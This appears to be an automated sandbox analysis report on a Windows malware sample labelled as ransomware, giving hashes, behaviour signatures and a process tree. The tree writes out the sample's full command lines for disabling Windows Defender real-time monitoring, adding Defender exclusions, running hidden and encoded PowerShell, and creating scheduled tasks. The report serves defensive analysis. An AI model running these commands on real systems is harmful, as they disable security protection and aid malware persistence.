Analysis

max time kernel: 99s
max time network: 99s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 24-05-2024 17:24

Static task: static1
Behavioral task: behavioral1
Sample: 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Resource: win7-20240508-en
General

Target: 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Size: 6.6MB
MD5: 11070066a80109c22a00ac720006bbaa
SHA1: 40158a0a3eb6005cc573903048200a0e436be246
SHA256: c1ae3f49094b9542b0ebdccba02fd1dabc49750ffe4ddbe38661ef3949181880
SHA512: 3830aff85e7743650a2834dce51965dd1c8e27655664d2a637e6608c7c03f07d186d4af24db37e83dae03c3c3b9a6af2813372e23af0f3dab276a147f516f1e0
SSDEEP: 98304:asuaZIj7qC0HX1apUVCvCrgtepFLUiXC2zirJYYdD9acfC7m+uAWUrBscFFK7IjV:lNZIOXAUCo9wJ2mruEscqrWUrc76P
Malware Config
Signatures

Modifies Windows Defender Real-time Protection settings
Processes: reg.exe (2)
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe

Windows security bypass
Processes: reg.exe (20)
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\AmZMNEdugmHLdDkPv = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ujRQKhsomqXgC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\jbMfBZnRCYwXWnVB = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\OrbPdMUPlnYWuuDN = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PHshpGZGOCOU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PKitbTPXU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gIbkOBIdgRUn = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\OrbPdMUPlnYWuuDN = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LmPBUjorYOxoMDhifcR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Command and Scripting Interpreter: PowerShell (1 TTPs, 5 IoCs)
Runs PowerShell with its display window hidden.
Processes:
pid | process
2672 | powershell.exe
2516 | powershell.EXE
2632 | powershell.EXE
2180 | powershell.exe
1556 | powershell.EXE
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, such as saved credentials.
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension (1 IoCs)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fpgljbjinlladnbmjndbjoohkjjcmidj\1.1.0_0\manifest.json | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Drops file in System32 directory (9 IoCs)
Processes:
description | ioc | process
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
Drops file in Program Files directory (13 IoCs)
Processes:
description | ioc | process
File created | C:\Program Files (x86)\PKitbTPXU\lwrzhv.dll | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files (x86)\PKitbTPXU\oMnXPgn.xml | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files (x86)\PHshpGZGOCOU2\tlhwkrLzThjvL.dll | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\OZIlESS.dll | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files (x86)\LmPBUjorYOxoMDhifcR\jSWGjfx.xml | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files (x86)\ujRQKhsomqXgC\YfXWsUL.xml | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files (x86)\PHshpGZGOCOU2\dfVGIgT.xml | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{3F73A70E-44C0-48A7-A9B6-A040BC51379C}.xpi | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files (x86)\gIbkOBIdgRUn\DjxOPzc.dll | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
File created | C:\Program Files (x86)\ujRQKhsomqXgC\DcrKsOm.dll | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Drops file in Windows directory (1 IoCs)
Processes:
description | ioc | process
File created | C:\Windows\Tasks\fErPICTAIBeQfSA.job | schtasks.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (1 IoCs)
Processes:
pid | pid_target | process | target process
236 | 1976 | WerFault.exe | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
Creates scheduled task(s) (1 TTPs, 9 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2432 | schtasks.exe
2300 | schtasks.exe
1188 | schtasks.exe
2184 | schtasks.exe
2148 | schtasks.exe
2640 | schtasks.exe
988 | schtasks.exe
2924 | schtasks.exe
1728 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (36 IoCs)
Processes:
pid | process | entries
2672 | powershell.exe | 3
2516 | powershell.EXE | 3
2632 | powershell.EXE | 3
2180 | powershell.exe | 1
1556 | powershell.EXE | 3
1976 | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe | 23
Suspicious use of AdjustPrivilegeToken (25 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 2672 | powershell.exe
Token: SeDebugPrivilege | 2516 | powershell.EXE
Token: SeDebugPrivilege | 2632 | powershell.EXE
Token: SeDebugPrivilege | 2180 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 1608 | WMIC.exe
Token: SeSecurityPrivilege | 1608 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1608 | WMIC.exe
Token: SeLoadDriverPrivilege | 1608 | WMIC.exe
Token: SeSystemProfilePrivilege | 1608 | WMIC.exe
Token: SeSystemtimePrivilege | 1608 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1608 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1608 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1608 | WMIC.exe
Token: SeBackupPrivilege | 1608 | WMIC.exe
Token: SeRestorePrivilege | 1608 | WMIC.exe
Token: SeShutdownPrivilege | 1608 | WMIC.exe
Token: SeDebugPrivilege | 1608 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1608 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1608 | WMIC.exe
Token: SeUndockPrivilege | 1608 | WMIC.exe
Token: SeManageVolumePrivilege | 1608 | WMIC.exe
Token: 33 | 1608 | WMIC.exe
Token: 34 | 1608 | WMIC.exe
Token: 35 | 1608 | WMIC.exe
Token: SeDebugPrivilege | 1556 | powershell.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
Processes:
description | pid | process | target process | entries
PID 1976 wrote to memory of 2984 | 1976 | 2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe | cmd.exe | 4
PID 2984 wrote to memory of 2564 | 2984 | cmd.exe | forfiles.exe | 4
PID 2564 wrote to memory of 3040 | 2564 | forfiles.exe | cmd.exe | 4
PID 3040 wrote to memory of 2596 | 3040 | cmd.exe | reg.exe | 4
PID 2984 wrote to memory of 2604 | 2984 | cmd.exe | forfiles.exe | 4
PID 2604 wrote to memory of 2560 | 2604 | forfiles.exe | cmd.exe | 4
PID 2560 wrote to memory of 2700 | 2560 | cmd.exe | reg.exe | 4
PID 2984 wrote to memory of 2704 | 2984 | cmd.exe | forfiles.exe | 4
PID 2704 wrote to memory of 2716 | 2704 | forfiles.exe | cmd.exe | 4
PID 2716 wrote to memory of 2736 | 2716 | cmd.exe | reg.exe | 4
PID 2984 wrote to memory of 2856 | 2984 | cmd.exe | forfiles.exe | 4
PID 2856 wrote to memory of 2608 | 2856 | forfiles.exe | cmd.exe | 4
PID 2608 wrote to memory of 2844 | 2608 | cmd.exe | reg.exe | 4
PID 2984 wrote to memory of 2688 | 2984 | cmd.exe | forfiles.exe | 4
PID 2688 wrote to memory of 2724 | 2688 | forfiles.exe | cmd.exe | 4
PID 2724 wrote to memory of 2672 | 2724 | cmd.exe | powershell.exe | 4
Processes

[1] C:\Users\Admin\AppData\Local\Temp\2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\2024-05-24_11070066a80109c22a00ac720006bbaa_bkransomware.exe"
  - Drops Chrome extension
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  [2] C:\Windows\SysWOW64\cmd.exe
    cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    - Suspicious use of WriteProcessMemory

    [3] C:\Windows\SysWOW64\forfiles.exe
      cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
        cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        - Suspicious use of WriteProcessMemory

        [5] \??\c:\windows\SysWOW64\reg.exe
          cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

    [3] C:\Windows\SysWOW64\forfiles.exe
      cmdline: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
        cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        - Suspicious use of WriteProcessMemory

        [5] \??\c:\windows\SysWOW64\reg.exe
          cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

    [3] C:\Windows\SysWOW64\forfiles.exe
      cmdline: forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
        cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        - Suspicious use of WriteProcessMemory

        [5] \??\c:\windows\SysWOW64\reg.exe
          cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

    [3] C:\Windows\SysWOW64\forfiles.exe
      cmdline: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
        cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        - Suspicious use of WriteProcessMemory

        [5] \??\c:\windows\SysWOW64\reg.exe
          cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

    [3] C:\Windows\SysWOW64\forfiles.exe
      cmdline: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      - Suspicious use of WriteProcessMemory

      [4] C:\Windows\SysWOW64\cmd.exe
        cmdline: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        - Suspicious use of WriteProcessMemory

        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: powershell start-process -WindowStyle Hidden gpupdate.exe /force
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

          [6] C:\Windows\SysWOW64\gpupdate.exe
            cmdline: "C:\Windows\system32\gpupdate.exe" /force

  [2] C:\Windows\SysWOW64\schtasks.exe
    cmdline: schtasks /CREATE /TN "gsKvgayyk" /SC once /ST 08:02:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)

  [2] C:\Windows\SysWOW64\schtasks.exe
    cmdline: schtasks /run /I /tn "gsKvgayyk"

  [2] C:\Windows\SysWOW64\schtasks.exe
    cmdline: schtasks /DELETE /F /TN "gsKvgayyk"

  [2] C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      - Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      - Modifies Windows Defender Real-time Protection settings

  [2] C:\Windows\SysWOW64\schtasks.exe
    cmdline: schtasks /CREATE /TN "gdRBvwRVC" /SC once /ST 10:49:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)

  [2] C:\Windows\SysWOW64\schtasks.exe
    cmdline: schtasks /run /I /tn "gdRBvwRVC"

  [2] C:\Windows\SysWOW64\schtasks.exe
    cmdline: schtasks /DELETE /F /TN "gdRBvwRVC"

  [2] C:\Windows\SysWOW64\forfiles.exe
    cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"

    [3] C:\Windows\SysWOW64\cmd.exe
      cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
        - Command and Scripting Interpreter: PowerShell
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

        [5] C:\Windows\SysWOW64\Wbem\WMIC.exe
          cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
          - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

  [2] C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

  [2] C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:32

  [2] C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\OrbPdMUPlnYWuuDN" /t REG_DWORD /d 0 /reg:64

  [2] C:\Windows\SysWOW64\cmd.exe
    cmdline: cmd /C copy nul "C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsf"

  [2] C:\Windows\SysWOW64\wscript.exe
    cmdline: wscript "C:\Windows\Temp\OrbPdMUPlnYWuuDN\IZsrEunH\nEukBecksDsrAYPv.wsf"

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LmPBUjorYOxoMDhifcR" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PHshpGZGOCOU2" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PKitbTPXU" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gIbkOBIdgRUn" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ujRQKhsomqXgC" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\jbMfBZnRCYwXWnVB" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
      cmdline: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    [3] C:\Windows\SysWOW64\reg.exe
